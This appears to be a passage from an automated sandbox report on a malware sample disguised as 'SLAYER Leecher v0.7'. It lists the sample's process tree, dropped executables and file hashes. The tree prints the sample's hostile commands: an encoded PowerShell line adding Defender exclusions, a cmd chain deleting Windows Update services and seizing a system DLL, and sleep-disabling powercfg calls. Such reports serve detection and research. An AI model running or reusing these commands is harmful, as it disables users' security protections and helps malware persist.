                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAYQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAGsAcwBsACMAPgA="
                                                    3⤵
                                                    • Drops file in System32 directory
                                                    • Modifies data under HKEY_USERS
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:172812
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                    3⤵
                                                      PID:245408
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop UsoSvc
                                                        4⤵
                                                        • Launches sc.exe
                                                        PID:245896
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop WaaSMedicSvc
                                                        4⤵
                                                        • Launches sc.exe
                                                        PID:245916
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop bits
                                                        4⤵
                                                        • Launches sc.exe
                                                        PID:245944
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                                        4⤵
                                                        • Modifies registry key
                                                        PID:245976
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop dosvc
                                                        4⤵
                                                        • Launches sc.exe
                                                        PID:245956
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                                        4⤵
                                                        • Modifies registry key
                                                        PID:245992
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                                        4⤵
                                                        • Modifies registry key
                                                        PID:246036
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                                        4⤵
                                                        • Modifies registry key
                                                        PID:246016
                                                      • C:\Windows\system32\takeown.exe
                                                        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:246064
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                                        4⤵
                                                        • Modifies registry key
                                                        PID:246052
                                                      • C:\Windows\system32\icacls.exe
                                                        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:246076
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop wuauserv
                                                        4⤵
                                                        • Launches sc.exe
                                                        PID:245932
                                                      • C:\Windows\system32\reg.exe
                                                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                                        4⤵
                                                        • Modifies registry key
                                                        PID:246112
                                                      • C:\Windows\system32\reg.exe
                                                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                                        4⤵
                                                        • Modifies registry key
                                                        PID:246124
                                                      • C:\Windows\system32\reg.exe
                                                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                                        4⤵
                                                        • Modifies registry key
                                                        PID:246148
                                                      • C:\Windows\system32\schtasks.exe
                                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                                        4⤵
                                                          PID:246160
                                                        • C:\Windows\system32\schtasks.exe
                                                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                                          4⤵
                                                            PID:246172
                                                          • C:\Windows\system32\reg.exe
                                                            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                                            4⤵
                                                            • Modifies registry key
                                                            PID:246136
                                                          • C:\Windows\system32\schtasks.exe
                                                            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                                            4⤵
                                                              PID:246184
                                                            • C:\Windows\system32\schtasks.exe
                                                              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                                              4⤵
                                                                PID:246196
                                                              • C:\Windows\system32\schtasks.exe
                                                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                                                4⤵
                                                                  PID:246208
                                                                • C:\Windows\system32\schtasks.exe
                                                                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                                  4⤵
                                                                    PID:246232
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                                    4⤵
                                                                      PID:246220
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                    3⤵
                                                                      PID:245452
                                                                      • C:\Windows\system32\powercfg.exe
                                                                        powercfg /x -hibernate-timeout-ac 0
                                                                        4⤵
                                                                          PID:245908
                                                                        • C:\Windows\system32\powercfg.exe
                                                                          powercfg /x -hibernate-timeout-dc 0
                                                                          4⤵
                                                                            PID:245968
                                                                          • C:\Windows\system32\powercfg.exe
                                                                            powercfg /x -standby-timeout-ac 0
                                                                            4⤵
                                                                              PID:246004
                                                                            • C:\Windows\system32\powercfg.exe
                                                                              powercfg /x -standby-timeout-dc 0
                                                                              4⤵
                                                                                PID:246028
                                                                            • C:\Windows\System32\conhost.exe
                                                                              C:\Windows\System32\conhost.exe "czellrako"
                                                                              3⤵
                                                                                PID:245764
                                                                              • C:\Windows\explorer.exe
                                                                                C:\Windows\explorer.exe jeqriwesihy0 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUXlyRZJXfJ5jiUwUr70AdCyDrkXUCGxfaV7s5kUsZ+M1jVBG7HUoq3EW6fYKxH5NP4M/tJ5/ZYtZM8EaX7F4M1t4UqpeucUZmwfkmLZunjXCsSyauoBJ4rCG2oWXgj+Mz1zn2/P6IvUiafyirYGJKq8C8Iyup27uke/hMzGar6avUzI4/Z1ZzYHHRT2ftkfrbrs42vCUVG1IbR8ZRcBC7Ao1zzvE5vXpY+VDlFfWGw15+M4nLexWOgOQVDDXZHeBpBgCj/w14IFN+FCTB6Al2NU86G5mCiX/+Uva7D8nJ2J1qLfiLlgpq/TvEYsAmX13t7wFi8BmicCdeYIniJ5DuJ7/iSaAZjUWWsZcGrXkQ2q/DfFYSw7GJUOukQkwOn40Ov8Ppyj+EQMrqmv3xPWDgiT5i5hP9N3bTWIlcHomC2uF2fR+my2wEys4OMviDWX52ANyfC7G7+Ud0EwdkbDAR64ybIsjuTmWts7p3aJRnhA27Lsuardo/7QJSF8ruzlRPbaWiNFLjOBolT+POpzyDSTxa3PWNfNB0QoyyNsg2goUHznkS33VEQSKMJUoZCIarJvcPMNQhStPuWbYNkeFVD8M6caD0NBWw3sazM2UjOhU=
                                                                                3⤵
                                                                                • Modifies data under HKEY_USERS
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:245840
                                                                          • C:\ProgramData\GeForce\Lib\COM Surrogate.exe
                                                                            "C:\ProgramData\GeForce\Lib\COM Surrogate.exe"
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:246676
                                                                          • C:\ProgramData\GeForce\Lib\COM Surrogate.exe
                                                                            "C:\ProgramData\GeForce\Lib\COM Surrogate.exe"
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:246688

                                                                          Network

                                                                          MITRE ATT&CK Enterprise v6

                                                                          Replay Monitor

                                                                          Loading Replay Monitor...

                                                                          Downloads

                                                                          • C:\Program Files\Google\Chrome\updater.exe

                                                                            Filesize

                                                                            4.1MB

                                                                            MD5

                                                                            d80a837c05b2d5e7a01a88c4c0b732c2

                                                                            SHA1

                                                                            b8f19db24542d475a6c1fe6df7af90e5c8695e9a

                                                                            SHA256

                                                                            471028f0fac064ea991379d4302b219750884fed5564be404eeca4824c5825a8

                                                                            SHA512

                                                                            fed76343ef08d4e9eb496c2b77c3f949a5868ce1a76ace0ec9116d8b22ad7eb3e12ed704fbb8de8f742e20d954e0bdc0bc51553be7f1d6522b9d58ce84db3632

                                                                          • C:\Program Files\Google\Chrome\updater.exe

                                                                            Filesize

                                                                            4.1MB

                                                                            MD5

                                                                            d80a837c05b2d5e7a01a88c4c0b732c2

                                                                            SHA1

                                                                            b8f19db24542d475a6c1fe6df7af90e5c8695e9a

                                                                            SHA256

                                                                            471028f0fac064ea991379d4302b219750884fed5564be404eeca4824c5825a8

                                                                            SHA512

                                                                            fed76343ef08d4e9eb496c2b77c3f949a5868ce1a76ace0ec9116d8b22ad7eb3e12ed704fbb8de8f742e20d954e0bdc0bc51553be7f1d6522b9d58ce84db3632

                                                                          • C:\ProgramData\GeForce\Lib\COM Surrogate.exe

                                                                            Filesize

                                                                            4.9MB

                                                                            MD5

                                                                            73b3415f513dd2718229b7ba87defee8

                                                                            SHA1

                                                                            fadd7a2619bee020339ca90ea65ba31eb3e8714f

                                                                            SHA256

                                                                            8fffbbfcd9ecea90252eed7fb2426c07e801eceb3eccfa660de98789b5cf423c

                                                                            SHA512

                                                                            7a6a791b14a8eade61c3d645e66acdef015ef515d4a7325b3eba1d0db22ae5b759651a86650b27c5162dbf7d7167cc4e229ceb079eae96b68a3fed48b0a8eb03

                                                                          • C:\ProgramData\GeForce\Lib\COM Surrogate.exe

                                                                            Filesize

                                                                            4.9MB

                                                                            MD5

                                                                            73b3415f513dd2718229b7ba87defee8

                                                                            SHA1

                                                                            fadd7a2619bee020339ca90ea65ba31eb3e8714f

                                                                            SHA256

                                                                            8fffbbfcd9ecea90252eed7fb2426c07e801eceb3eccfa660de98789b5cf423c

                                                                            SHA512

                                                                            7a6a791b14a8eade61c3d645e66acdef015ef515d4a7325b3eba1d0db22ae5b759651a86650b27c5162dbf7d7167cc4e229ceb079eae96b68a3fed48b0a8eb03

                                                                          • C:\ProgramData\GeForce\Lib\COM Surrogate.exe

                                                                            Filesize

                                                                            4.9MB

                                                                            MD5

                                                                            73b3415f513dd2718229b7ba87defee8

                                                                            SHA1

                                                                            fadd7a2619bee020339ca90ea65ba31eb3e8714f

                                                                            SHA256

                                                                            8fffbbfcd9ecea90252eed7fb2426c07e801eceb3eccfa660de98789b5cf423c

                                                                            SHA512

                                                                            7a6a791b14a8eade61c3d645e66acdef015ef515d4a7325b3eba1d0db22ae5b759651a86650b27c5162dbf7d7167cc4e229ceb079eae96b68a3fed48b0a8eb03

                                                                          • C:\ProgramData\GeForce\Lib\COM Surrogate.exe

                                                                            Filesize

                                                                            4.9MB

                                                                            MD5

                                                                            73b3415f513dd2718229b7ba87defee8

                                                                            SHA1

                                                                            fadd7a2619bee020339ca90ea65ba31eb3e8714f

                                                                            SHA256

                                                                            8fffbbfcd9ecea90252eed7fb2426c07e801eceb3eccfa660de98789b5cf423c

                                                                            SHA512

                                                                            7a6a791b14a8eade61c3d645e66acdef015ef515d4a7325b3eba1d0db22ae5b759651a86650b27c5162dbf7d7167cc4e229ceb079eae96b68a3fed48b0a8eb03

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\Setup.exe.log

                                                                            Filesize

                                                                            408B

                                                                            MD5

                                                                            8e1e19a5abcce21f8a12921d6a2eeeee

                                                                            SHA1

                                                                            b5704368dfd8fc7aeafb15c23b69895e809fe20e

                                                                            SHA256

                                                                            22cf24d10cc11a9bb23268f18afbc8f3481c27e1feb4cb42ba5c8775e12720e3

                                                                            SHA512

                                                                            48365f858592d677ef5d0e2948f672234898e47a153eec32592a2e079353702a64e41e1aa59250f05bd690690b9edfb8455dfac90c6695fb7c0b6907a057fe78

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\svchost.exe.log

                                                                            Filesize

                                                                            414B

                                                                            MD5

                                                                            983aa429d99a12ff8ed48b83a6110c4e

                                                                            SHA1

                                                                            85d448983f242f093588e87246f5ebc33e1bd3ce

                                                                            SHA256

                                                                            f8a5f71d86b91a84178ee7a5525c97b0c19e3954876fd477aec9bd9624349fe6

                                                                            SHA512

                                                                            aae10a2ff599c628ba0827e5170a113f5a797392d785bdc6586a1d2d577b5ff83674a53fe7f00a14652d2988e2681bb551c1865734c03acb664c71d8ac93297f

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                            Filesize

                                                                            2KB

                                                                            MD5

                                                                            d85ba6ff808d9e5444a4b369f5bc2730

                                                                            SHA1

                                                                            31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                            SHA256

                                                                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                            SHA512

                                                                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Filesize

                                                                            14KB

                                                                            MD5

                                                                            61d8dafd05bdbad66c038be093761f1c

                                                                            SHA1

                                                                            72e9d85b3d05fb28f2a41aeac8da1e6d97f593f0

                                                                            SHA256

                                                                            b0d2f824951908a7c41e271f7edd1addf4b8ace05768aa10681ea75df3d5f459

                                                                            SHA512

                                                                            6ee400569e4c971dba7df3dacf77f1ff73272a3bc19acc35078d89f04368f938aced844edab9b401822e788aeed8d39b88cde7092d2d7a02b599ba7bbb331d93

                                                                          • C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp

                                                                            Filesize

                                                                            36B

                                                                            MD5

                                                                            8708699d2c73bed30a0a08d80f96d6d7

                                                                            SHA1

                                                                            684cb9d317146553e8c5269c8afb1539565f4f78

                                                                            SHA256

                                                                            a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f

                                                                            SHA512

                                                                            38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264

                                                                          • C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp

                                                                            Filesize

                                                                            36B

                                                                            MD5

                                                                            8708699d2c73bed30a0a08d80f96d6d7

                                                                            SHA1

                                                                            684cb9d317146553e8c5269c8afb1539565f4f78

                                                                            SHA256

                                                                            a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f

                                                                            SHA512

                                                                            38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264

                                                                          • C:\Users\Admin\AppData\Local\Temp\1.exe

                                                                            Filesize

                                                                            111KB

                                                                            MD5

                                                                            dab5342d0d566bc7d80e1cc11459912e

                                                                            SHA1

                                                                            7cd1a45da9458278571b13f08b28f607093e1225

                                                                            SHA256

                                                                            fa6ed407a949b1da6c2123ef67ef53280c4bb02bde373c62cad3ae228b5a4dd1

                                                                            SHA512

                                                                            0ccb2bc126d3a9e4af8cc022d93db95a9b542beb488bc23f55ade60cf7a5437657a9a0095cb4b8f56408fb75eddcb8d80a1c7ba2e658a889c57762d8d3f77d72

                                                                          • C:\Users\Admin\AppData\Local\Temp\1.exe

                                                                            Filesize

                                                                            111KB

                                                                            MD5

                                                                            dab5342d0d566bc7d80e1cc11459912e

                                                                            SHA1

                                                                            7cd1a45da9458278571b13f08b28f607093e1225

                                                                            SHA256

                                                                            fa6ed407a949b1da6c2123ef67ef53280c4bb02bde373c62cad3ae228b5a4dd1

                                                                            SHA512

                                                                            0ccb2bc126d3a9e4af8cc022d93db95a9b542beb488bc23f55ade60cf7a5437657a9a0095cb4b8f56408fb75eddcb8d80a1c7ba2e658a889c57762d8d3f77d72

                                                                          • C:\Users\Admin\AppData\Local\Temp\10.exe

                                                                            Filesize

                                                                            413KB

                                                                            MD5

                                                                            5998150187408a1d1da9090a8cbf4a6d

                                                                            SHA1

                                                                            d764bab45313e96d050c43c2c476d28baa2c1eaf

                                                                            SHA256

                                                                            8fb31b017a281212c5246fd1aad185548aee1ada35574b3758439d8921f24626

                                                                            SHA512

                                                                            83540bc89b1ac0d2ce1423e675c8781f326fb9fc9188e5545ba13ba52d8e376a98e6768b5f349e6df481745426c6cf62ead4d2aee5ea280634faaeedf4ca60cb

                                                                          • C:\Users\Admin\AppData\Local\Temp\10.exe

                                                                            Filesize

                                                                            413KB

                                                                            MD5

                                                                            5998150187408a1d1da9090a8cbf4a6d

                                                                            SHA1

                                                                            d764bab45313e96d050c43c2c476d28baa2c1eaf

                                                                            SHA256

                                                                            8fb31b017a281212c5246fd1aad185548aee1ada35574b3758439d8921f24626

                                                                            SHA512

                                                                            83540bc89b1ac0d2ce1423e675c8781f326fb9fc9188e5545ba13ba52d8e376a98e6768b5f349e6df481745426c6cf62ead4d2aee5ea280634faaeedf4ca60cb

                                                                          • C:\Users\Admin\AppData\Local\Temp\11.exe

                                                                            Filesize

                                                                            1.4MB

                                                                            MD5

                                                                            00854e47bc6249cefca953ddc3f20f48

                                                                            SHA1

                                                                            fbec3af2ab8c29e660c86ecbf5d1c0ca7a33163d

                                                                            SHA256

                                                                            981b59093b5e83b9956e1a191e763352ba8f270cc2e73fe1b0b172139469a1fa

                                                                            SHA512

                                                                            1ed70afc8d7b4cc4c12c1a6e7935363caf939b4621ed26397d03eac56d8ef572dda71f3760bd84ece02f9c06f8435c330cf5dad950b56ff4f789a9eafa1ae119

                                                                          • C:\Users\Admin\AppData\Local\Temp\11.exe

                                                                            Filesize

                                                                            1.4MB

                                                                            MD5

                                                                            00854e47bc6249cefca953ddc3f20f48

                                                                            SHA1

                                                                            fbec3af2ab8c29e660c86ecbf5d1c0ca7a33163d

                                                                            SHA256

                                                                            981b59093b5e83b9956e1a191e763352ba8f270cc2e73fe1b0b172139469a1fa

                                                                            SHA512

                                                                            1ed70afc8d7b4cc4c12c1a6e7935363caf939b4621ed26397d03eac56d8ef572dda71f3760bd84ece02f9c06f8435c330cf5dad950b56ff4f789a9eafa1ae119

                                                                          • C:\Users\Admin\AppData\Local\Temp\2.exe

                                                                            Filesize

                                                                            1.4MB

                                                                            MD5

                                                                            9bda451a29ccd4791cf8ac5c240e8048

                                                                            SHA1

                                                                            7ecded8397484e5b4cfcad8fdbe167bb1af2b11f

                                                                            SHA256

                                                                            a7f3ec78e6e5b53b6b8206074895b5832649c64f07bb1b55c3a1c2c9144a7635

                                                                            SHA512

                                                                            acda727d50b14932cacdfd476d98ba93426f681331d910ea9df97458c6d4d2848bee669b1e62f1476e94050447e1b7d9b62e6542f5ed511f91b0516e62fe880c

                                                                          • C:\Users\Admin\AppData\Local\Temp\2.exe

                                                                            Filesize

                                                                            1.4MB

                                                                            MD5

                                                                            9bda451a29ccd4791cf8ac5c240e8048

                                                                            SHA1

                                                                            7ecded8397484e5b4cfcad8fdbe167bb1af2b11f

                                                                            SHA256

                                                                            a7f3ec78e6e5b53b6b8206074895b5832649c64f07bb1b55c3a1c2c9144a7635

                                                                            SHA512

                                                                            acda727d50b14932cacdfd476d98ba93426f681331d910ea9df97458c6d4d2848bee669b1e62f1476e94050447e1b7d9b62e6542f5ed511f91b0516e62fe880c

                                                                          • C:\Users\Admin\AppData\Local\Temp\3.exe

                                                                            Filesize

                                                                            4.9MB

                                                                            MD5

                                                                            43e86612f2667d3df11c97c2aacadc97

                                                                            SHA1

                                                                            6e3b37c580840dd44444b249941e98fd1b49852c

                                                                            SHA256

                                                                            d66ac4afb7574c2ee7f6a824b9b2f8eb505a2dcc00cb6790863493b6d1568591

                                                                            SHA512

                                                                            0479701ee351e11af34c816ab514715219660de59f9e7f37a264417b1e968896f5eef8cac4463586eb9b4994d245791cb7edf901f463f2165b8f1320930e1df0

                                                                          • C:\Users\Admin\AppData\Local\Temp\3.exe

                                                                            Filesize

                                                                            4.9MB

                                                                            MD5

                                                                            43e86612f2667d3df11c97c2aacadc97

                                                                            SHA1

                                                                            6e3b37c580840dd44444b249941e98fd1b49852c

                                                                            SHA256

                                                                            d66ac4afb7574c2ee7f6a824b9b2f8eb505a2dcc00cb6790863493b6d1568591

                                                                            SHA512

                                                                            0479701ee351e11af34c816ab514715219660de59f9e7f37a264417b1e968896f5eef8cac4463586eb9b4994d245791cb7edf901f463f2165b8f1320930e1df0

                                                                          • C:\Users\Admin\AppData\Local\Temp\5.exe

                                                                            Filesize

                                                                            95KB

                                                                            MD5

                                                                            af8a3a1cb685f9e1fdcc970bd4ca420f

                                                                            SHA1

                                                                            9342d6f660df293516c2932c905fe4411474e321

                                                                            SHA256

                                                                            39d7aead40f62566713de4ad6f430c06973fda6da972748f982a3d75f23715a9

                                                                            SHA512

                                                                            04864f3c6d4447694d4d4e4d5722302b13a41827d33fd3390fdc2e2c5f3dc8169bab0781099c79f0cb7b6af6d0b4870a3b226ab92ef37b62cca0aa86e00f4186

                                                                          • C:\Users\Admin\AppData\Local\Temp\5.exe

                                                                            Filesize

                                                                            95KB

                                                                            MD5

                                                                            af8a3a1cb685f9e1fdcc970bd4ca420f

                                                                            SHA1

                                                                            9342d6f660df293516c2932c905fe4411474e321

                                                                            SHA256

                                                                            39d7aead40f62566713de4ad6f430c06973fda6da972748f982a3d75f23715a9

                                                                            SHA512

                                                                            04864f3c6d4447694d4d4e4d5722302b13a41827d33fd3390fdc2e2c5f3dc8169bab0781099c79f0cb7b6af6d0b4870a3b226ab92ef37b62cca0aa86e00f4186

                                                                          • C:\Users\Admin\AppData\Local\Temp\6.exe

                                                                            Filesize

                                                                            4.1MB

                                                                            MD5

                                                                            d80a837c05b2d5e7a01a88c4c0b732c2

                                                                            SHA1

                                                                            b8f19db24542d475a6c1fe6df7af90e5c8695e9a

                                                                            SHA256

                                                                            471028f0fac064ea991379d4302b219750884fed5564be404eeca4824c5825a8

                                                                            SHA512

                                                                            fed76343ef08d4e9eb496c2b77c3f949a5868ce1a76ace0ec9116d8b22ad7eb3e12ed704fbb8de8f742e20d954e0bdc0bc51553be7f1d6522b9d58ce84db3632

                                                                          • C:\Users\Admin\AppData\Local\Temp\6.exe

                                                                            Filesize

                                                                            4.1MB

                                                                            MD5

                                                                            d80a837c05b2d5e7a01a88c4c0b732c2

                                                                            SHA1

                                                                            b8f19db24542d475a6c1fe6df7af90e5c8695e9a

                                                                            SHA256

                                                                            471028f0fac064ea991379d4302b219750884fed5564be404eeca4824c5825a8

                                                                            SHA512

                                                                            fed76343ef08d4e9eb496c2b77c3f949a5868ce1a76ace0ec9116d8b22ad7eb3e12ed704fbb8de8f742e20d954e0bdc0bc51553be7f1d6522b9d58ce84db3632

                                                                          • C:\Users\Admin\AppData\Local\Temp\7.exe

                                                                            Filesize

                                                                            2.4MB

                                                                            MD5

                                                                            7612d86c7e4b0d6624a1387da41c18ee

                                                                            SHA1

                                                                            aef37933ce24a135f0f84d09351b852f09ea1e58

                                                                            SHA256

                                                                            761466bbd912ee25f7303102c251f50955f15535758becdee8f4afed1eb358cb

                                                                            SHA512

                                                                            e2fe5f95b691c5923eb3413cda4f3bdc9712f1962ca232a1a765f98d21bcc86d4a2fe56cc40841f989ec981e7c68aeba0ed3fa9c151d5f15403a54befbc9cfa0

                                                                          • C:\Users\Admin\AppData\Local\Temp\7.exe

                                                                            Filesize

                                                                            2.4MB

                                                                            MD5

                                                                            7612d86c7e4b0d6624a1387da41c18ee

                                                                            SHA1

                                                                            aef37933ce24a135f0f84d09351b852f09ea1e58

                                                                            SHA256

                                                                            761466bbd912ee25f7303102c251f50955f15535758becdee8f4afed1eb358cb

                                                                            SHA512

                                                                            e2fe5f95b691c5923eb3413cda4f3bdc9712f1962ca232a1a765f98d21bcc86d4a2fe56cc40841f989ec981e7c68aeba0ed3fa9c151d5f15403a54befbc9cfa0

                                                                          • C:\Users\Admin\AppData\Local\Temp\8.exe

                                                                            Filesize

                                                                            367KB

                                                                            MD5

                                                                            50e064b49ae012894a53fe30dac655d6

                                                                            SHA1

                                                                            19181a85a5d89d32cd8716b15b9160336168d273

                                                                            SHA256

                                                                            fac1c9a5d8f1c7999b69ba9746762cf8ce45c4bb961d1e973a657bbf4751bbb0

                                                                            SHA512

                                                                            4c766a3f4ab7e6a3d5d161ecc8d5e78183a3abf377ca3e7b27efba68a384be1b8a32c61f1ed0ca2333e90d1b9aa43224aeb9e4aa13fe813c00a58f380623a8ef

                                                                          • C:\Users\Admin\AppData\Local\Temp\8.exe

                                                                            Filesize

                                                                            367KB

                                                                            MD5

                                                                            50e064b49ae012894a53fe30dac655d6

                                                                            SHA1

                                                                            19181a85a5d89d32cd8716b15b9160336168d273

                                                                            SHA256

                                                                            fac1c9a5d8f1c7999b69ba9746762cf8ce45c4bb961d1e973a657bbf4751bbb0

                                                                            SHA512

                                                                            4c766a3f4ab7e6a3d5d161ecc8d5e78183a3abf377ca3e7b27efba68a384be1b8a32c61f1ed0ca2333e90d1b9aa43224aeb9e4aa13fe813c00a58f380623a8ef

                                                                          • C:\Users\Admin\AppData\Local\Temp\9.exe

                                                                            Filesize

                                                                            2.5MB

                                                                            MD5

                                                                            6cabeda725dedf18f07565dd8ce222fd

                                                                            SHA1

                                                                            e42cc2c0cf55c603f322677b5008da0e9752d30e

                                                                            SHA256

                                                                            7a6559eaa68cba0fdc1f101ab6c294e5c4205a6134fd9bb442eef2a49d700bbf

                                                                            SHA512

                                                                            2050ae6204b8adaae332a678fc866c2638b1f08a6d7e72301aa6306164c415bfacf7f9b8cd93f532c3901b58a51c554c3a90039dfd839ad5994dca1e2e18c947

                                                                          • C:\Users\Admin\AppData\Local\Temp\9.exe

                                                                            Filesize

                                                                            2.5MB

                                                                            MD5

                                                                            6cabeda725dedf18f07565dd8ce222fd

                                                                            SHA1

                                                                            e42cc2c0cf55c603f322677b5008da0e9752d30e

                                                                            SHA256

                                                                            7a6559eaa68cba0fdc1f101ab6c294e5c4205a6134fd9bb442eef2a49d700bbf

                                                                            SHA512

                                                                            2050ae6204b8adaae332a678fc866c2638b1f08a6d7e72301aa6306164c415bfacf7f9b8cd93f532c3901b58a51c554c3a90039dfd839ad5994dca1e2e18c947

                                                                          • C:\Users\Admin\AppData\Local\Temp\SLAYER Leecher v0.7 .exe

                                                                            Filesize

                                                                            6.6MB

                                                                            MD5

                                                                            aa0b6211f5245f25392b74fdbab048eb

                                                                            SHA1

                                                                            05c37446aca08847a2688257d0fb138f560b4db2

                                                                            SHA256

                                                                            74cb827e0324e02bae1b2632b624ff84bd4bd54b796bb046fa27f557ca8f8674

                                                                            SHA512

                                                                            97e44da681f5b7db132cd37b1a6305f45d5ec546a23ae3f55f8a8cd214e5c76d22947d12a844767c88fc1844f297f7ce7a85569859286b3b5816144979d05176

